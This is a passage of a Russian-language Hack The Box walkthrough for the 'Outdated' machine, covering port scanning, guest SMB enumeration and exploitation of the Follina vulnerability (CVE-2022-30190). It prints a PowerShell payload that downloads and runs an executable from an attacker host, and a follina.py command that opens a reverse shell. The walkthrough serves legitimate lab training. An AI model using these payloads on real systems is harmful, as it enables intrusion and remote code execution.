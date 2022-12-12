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Площадкой для упражнений нам послужит тренировочная машина Outdated с площадки Hack The Box. Ее уровень сложности оценен как средний.
warning
Подключаться к машинам с HTB рекомендуется только через VPN. Не делай этого с компьютеров, где есть важные для тебя данные, так как ты окажешься в общей сети с другими участниками.
Разведка
Сканирование портов
Добавляем IP-адрес машины в
/:
10.10.11.175 outdated.htb
И запускаем сканирование портов.
Справка: сканирование портов
Сканирование портов — стандартный первый шаг при любой атаке. Он позволяет атакующему узнать, какие службы на хосте принимают соединение. На основе этой информации выбирается следующий шаг к получению точки входа.
Наиболее известный инструмент для сканирования — это Nmap. Улучшить результаты его работы ты можешь при помощи следующего скрипта:
#!/bin/bashports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)nmap -p$ports -A $1
Он действует в два этапа. На первом производится обычное быстрое сканирование, на втором — более тщательное сканирование, с использованием имеющихся скриптов (опция
-A).
Мы нашли много открытых портов, что типично для Windows:
- 25 — служба SMTP (почтовый сервер);
- 53 — служба DNS;
- 88 (фильтруется) — служба Kerberos;
- 135 — служба удаленного вызова процедур (Microsoft RPC). Используется для операций взаимодействия контроллер — контроллер и контроллер — клиент;
- 139 — служба сеансов NetBIOS, NetLogon;
- 389 (фильтруется) — служба LDAP;
- 445 — служба SMB;
- 464 — служба смены пароля Kerberos;
- 593 (HTTP-RPC-EPMAP) — используется в службах DCOM и MS Exchange;
- 636 — LDAP с шифрованием SSL или TLS;
- 3268 (LDAP) (фильтруется) — для доступа к Global Catalog от клиента к контроллеру;
- 3269 (LDAPS) — для доступа к Global Catalog от клиента к контроллеру через защищенное соединение;
- 5985 (фильтруется) — служба удаленного управления WinRM;
- 8530, 8531 (фильтруется) — служба WSUS для обновлений операционных систем и продуктов Microsoft;
- 9389 (фильтруется) — веб‑службы AD DS.
Порты 22 и 636 открывают нам новые доменные имена, которые добавим в файл
/:
10.10.11.175 outdated.htb dc.outdated.htb mail.outdated.htb
Точка входа
Первым делом необходимо проверить, нет ли анонимного доступа к службе SMB. Для этого авторизуемся от имени пользователя
guest с пустым паролем. С помощью утилиты CrackMapExec с параметром
--shares можем сразу получить доступные общие ресурсы.
crackmapexec smb 10.10.11.175 -u 'guest' -p '' --shares
Получаем список общих ресурсов и отмечаем для себя доступный для чтения каталог
Shares. Для работы с ресурсом SMB будем использовать smbclient из пакета скриптов impacket.
impacket-smbclient guest@dc.outdated.htb
use shares
ls
Находим всего один документ, который забираем на свой хост командой
get .
Это отчет, который предоставляет нам список текущих уязвимостей (не факт, что закрытых). Также говорится, что мы можем прислать на адрес itsupport@outdated.htb ссылку на уязвимое приложение. В списке отмечаем недавно нашумевшую уязвимость CVE-2022-30190, она же Follina.
Точка опоры
Воспользуемся готовым эксплоитом, но так как нам нужна ссылка на саму нагрузку, а не документ, содержащий ее, то внесем одно изменение. Найдем в исходном коде нагрузку и изменим ее на команду, которая скачает исполняемый файл и затем запустит.
Invoke-WebRequest http://10.10.14.24:8080/demon.exe -OutFile C:\\Windows\\Tasks\\demon.exe; C:\\Windows\\Tasks\\demon.exe
Теперь запустим файл
follina., содержащий и нагрузку, и веб‑сервер, и листенер. Но вместо
netcat мы будем использовать нагрузку Havoc.
python3 follina.py --interface tun0 --port 8000 --reverse 4321
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